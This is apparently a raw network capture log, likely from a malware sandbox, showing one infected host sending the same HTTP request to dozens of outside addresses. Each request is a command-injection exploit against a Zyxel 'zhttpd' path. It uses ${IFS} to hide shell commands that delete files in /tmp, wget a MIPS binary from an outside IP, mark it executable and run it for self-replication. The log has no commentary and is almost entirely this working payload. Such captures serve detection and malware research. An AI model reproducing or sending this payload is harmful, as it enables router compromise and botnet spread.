                                          Jan 14, 2024 15:46:03.755855083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1502192.168.2.233839061.75.16.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.755870104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1503192.168.2.234079251.63.76.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.755876064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1504192.168.2.2340124176.254.171.102443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.755901098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1505192.168.2.233402418.231.210.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.755929947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1506192.168.2.2350348203.59.152.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.755948067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1507192.168.2.2354076152.19.234.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.756001949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1508192.168.2.234471242.137.133.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.756011963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1509192.168.2.234348842.221.224.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.756037951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1510192.168.2.2334256126.71.118.124443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.756082058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1511192.168.2.2343716122.169.235.96443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.756130934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1512192.168.2.233365484.55.243.57443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.756136894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1513192.168.2.2344892119.217.152.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.756177902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1514192.168.2.23428382.46.13.114443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.756195068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1515192.168.2.2349494124.166.88.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.756252050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1516192.168.2.2334786135.184.15.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.756264925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1517192.168.2.23341509.88.148.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.756292105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1518192.168.2.236063094.8.104.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.756304979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1519192.168.2.235714492.110.194.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.756356955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1520192.168.2.2357076177.212.147.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.756386995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1521192.168.2.234528878.106.42.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.756403923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1522192.168.2.2354346177.255.80.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.756442070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1523192.168.2.235406690.249.91.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.756453037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1524192.168.2.233785423.112.205.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.756474972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1525192.168.2.233594886.251.209.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.765299082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1526192.168.2.2346384205.164.171.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.765330076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1527192.168.2.2340618205.41.43.57443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.765367031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1528192.168.2.235826857.225.163.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.765429974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1529192.168.2.2344552155.219.87.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.765466928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1530192.168.2.2355114108.0.144.74443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.765501976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1531192.168.2.233855084.251.55.92443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.765558004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1532192.168.2.2339482157.192.179.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.765597105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1533192.168.2.2350654112.61.215.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.765618086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1534192.168.2.2349704130.194.250.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.765660048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1535192.168.2.2337372130.248.153.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.765682936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1536192.168.2.2337284208.94.93.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.765741110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1537192.168.2.236008041.58.116.222443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.765785933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1538192.168.2.235908818.237.125.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.765821934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1539192.168.2.235560685.55.203.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.765836954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1540192.168.2.2340320172.107.118.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.765863895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1541192.168.2.233545487.43.177.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.765908003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1542192.168.2.2333974171.245.159.196443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.765937090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1543192.168.2.233758046.205.226.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.765969038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1544192.168.2.234098467.250.252.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.766014099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1545192.168.2.23413249.140.21.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.766057014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1546192.168.2.235670663.94.27.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.766100883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1547192.168.2.234113890.34.215.50443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.766122103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1548192.168.2.2344774130.194.92.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.766144991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1549192.168.2.2358534156.199.208.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.766160965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1550192.168.2.23540884.141.180.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.766200066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1551192.168.2.235493257.112.34.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.766233921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1552192.168.2.2348916157.185.139.168443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.766248941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1553192.168.2.2360060106.11.102.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.766295910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1554192.168.2.2335960128.87.198.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.766331911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1555192.168.2.2347604147.58.163.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.766357899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1556192.168.2.234570213.21.128.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.766407967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1557192.168.2.2346536191.217.162.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.766433954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1558192.168.2.234185870.76.21.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.766463041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1559192.168.2.234903681.2.180.237443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.766506910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1560192.168.2.2335878201.171.84.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.766573906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1561192.168.2.2335730222.39.65.159443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.766618013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1562192.168.2.2338704176.164.28.3443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.766639948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1563192.168.2.2345882213.80.72.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:04.766693115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1564192.168.2.235938265.190.88.183443
                                          TimestampBytes transferredDirectionData
